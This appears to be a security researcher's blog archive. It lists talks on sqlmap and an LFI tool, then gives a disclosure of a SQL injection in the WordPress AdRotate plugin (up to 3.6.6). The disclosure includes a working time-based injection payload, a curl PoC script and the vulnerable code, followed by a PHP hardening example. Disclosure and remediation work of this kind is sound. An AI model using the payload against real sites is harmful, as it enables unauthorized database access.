Thursday, September 19, 2013

Heuristic methods used in sqlmap

You can find slides for my talk "Heuristic methods used in sqlmap" held at FSec 2013 conference (Croatia / Varazdin 19th September 2013) here:

Tuesday, May 28, 2013

sqlmap - Under the Hood

You can find slides for my talk "sqlmap - Under the Hood" held at PHDays 2013 conference (Russia / Moscow 23rd–24th May 2013) here:

Tuesday, April 9, 2013

Panoptic


Panoptic is an open source penetration testing tool that automates the search for and retrieval of the content of common log and config files through an LFI vulnerability. The official introductory post can be found here. Also, you can find a sample run here.

The tool was made in collaboration with Roberto Salgado (@LightOS), while I have to say that he is responsible for the idea itself.

Monday, October 29, 2012

Spot the Web Vulnerability

You can find slides for my talk "Spot the Web Vulnerability" at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) here:

Tuesday, June 5, 2012

Data Retrieval over DNS in SQL Injection Attacks

You can find the paper titled "Data Retrieval over DNS in SQL Injection Attacks", written for and presented at the PHDays 2012 conference (Russia / Moscow 30th–31st May 2012), here:

DNS exfiltration using sqlmap

You can find the slides (together with a link to the video presentation) for my talk "DNS exfiltration using sqlmap" held at the PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) here:

Monday, November 14, 2011

WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability

# Exploit Title: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability
# Date: 2011-11-8
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip
# Version: 3.6.6 (tested)
# Note: the $_GET["track"] parameter has to be Base64 encoded

---
PoC
---
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj

e.g.
#!/bin/bash
payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
encoded=$(echo -n "$payload" | base64 -w 0)
curl "http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded"

---------------
Vulnerable code
---------------

if(isset($_GET['track']) OR $_GET['track'] != '') {
    $meta = base64_decode($_GET['track']);
    ...
    list($ad, $group, $block) = explode("-", $meta);
    ...
    $bannerurl = $wpdb->get_var($wpdb->prepare("SELECT `link` FROM `".$prefix."adrotate` WHERE `id` = '".$ad."' LIMIT 1;")); // wrong (mis)usage of wpdb->prepare(): $ad is concatenated into the query string and no placeholder arguments are passed, so nothing gets escaped

P.S. Tried to contact the author and the WordPress team, but without any luck.
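As an added example (not from the advisory above and not the AdRotate plugin's code), the stand-alone PHP script below puts the prepare() misuse next to the placeholder form and validates the decoded track value before any part of it reaches SQL. StandInWpdb is a hypothetical, simplified stand-in for WordPress's $wpdb so that the script runs outside WordPress (it escapes %s arguments with addslashes(), whereas real wpdb uses the database driver's escaping). Treating the ad id as an integer (%d) and requiring the decoded value to be three numeric fields joined by "-" are assumptions about the plugin's data, based only on the explode("-", $meta) line shown above.

```php
<?php
// Added example, not part of the advisory or of the AdRotate plugin.
// StandInWpdb is a hypothetical, simplified stand-in for WordPress's $wpdb.
class StandInWpdb {
    public $prefix = 'wp_';

    // Simplified stand-in for wpdb::prepare(): %d is cast to int by vsprintf,
    // %s is escaped and quoted. With no extra arguments the query is returned
    // as given, which is why the plugin's call escapes nothing.
    public function prepare($query, ...$args) {
        if (count($args) === 0) {
            return $query;
        }
        // addslashes() is a stand-in for the driver escaping real wpdb uses.
        $escaped = array_map(function ($a) { return addslashes((string) $a); }, $args);
        // Quote %s placeholders (strip caller-added quotes first, as wpdb does).
        $query = str_replace("'%s'", '%s', $query);
        $query = str_replace('%s', "'%s'", $query);
        return vsprintf($query, $escaped);
    }
}

// Vulnerable pattern from the advisory: $ad is concatenated into the SQL and
// prepare() receives no placeholder arguments, so nothing is escaped.
function vulnerable_query(StandInWpdb $wpdb, $ad) {
    return $wpdb->prepare("SELECT `link` FROM `" . $wpdb->prefix . "adrotate` WHERE `id` = '" . $ad . "' LIMIT 1;");
}

// Hardened form: a placeholder plus an argument, so prepare() binds the value.
// %d is used on the assumption that the id column is an integer.
function hardened_query(StandInWpdb $wpdb, $ad) {
    return $wpdb->prepare("SELECT `link` FROM `{$wpdb->prefix}adrotate` WHERE `id` = %d LIMIT 1", $ad);
}

// Validate the decoded track value before using any part of it. The plugin
// splits it into ad-group-block (three fields); requiring each field to be a
// non-negative integer is an assumption about the plugin's data.
function parse_track($track) {
    $meta = base64_decode($track, true);            // strict: reject non-Base64 input
    if ($meta === false || !preg_match('/^(\d+)-(\d+)-(\d+)$/', $meta)) {
        return null;                                 // reject anything else before SQL
    }
    list($ad, $group, $block) = array_map('intval', explode('-', $meta));
    return array('ad' => $ad, 'group' => $group, 'block' => $block);
}

$wpdb = new StandInWpdb();

// Constructed benign value: Base64 of "12-3-4".
$benign = base64_encode('12-3-4');
// The PoC value quoted in the advisory above.
$poc = 'MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj';

foreach (array('benign' => $benign, 'poc' => $poc) as $label => $track) {
    $parsed = parse_track($track);
    echo "$label: " . ($parsed === null ? "rejected before SQL" : "ad={$parsed['ad']}") . "\n";
    // Show what each query builder would have sent for the raw decoded id.
    list($ad) = explode('-', base64_decode($track));
    echo "  vulnerable: " . vulnerable_query($wpdb, $ad) . "\n";
    echo "  hardened:   " . hardened_query($wpdb, $ad) . "\n";
}
```

Run it with `php example.php` (PHP 5.6 or later, for the variadic parameter). The benign value parses to ad=12, and both builders produce an equivalent query for it; the PoC value is rejected by parse_track(), and even when its raw decoded id is fed straight to the builders, the hardened query collapses it to `id` = 1 while the vulnerable one emits the injected SQL verbatim.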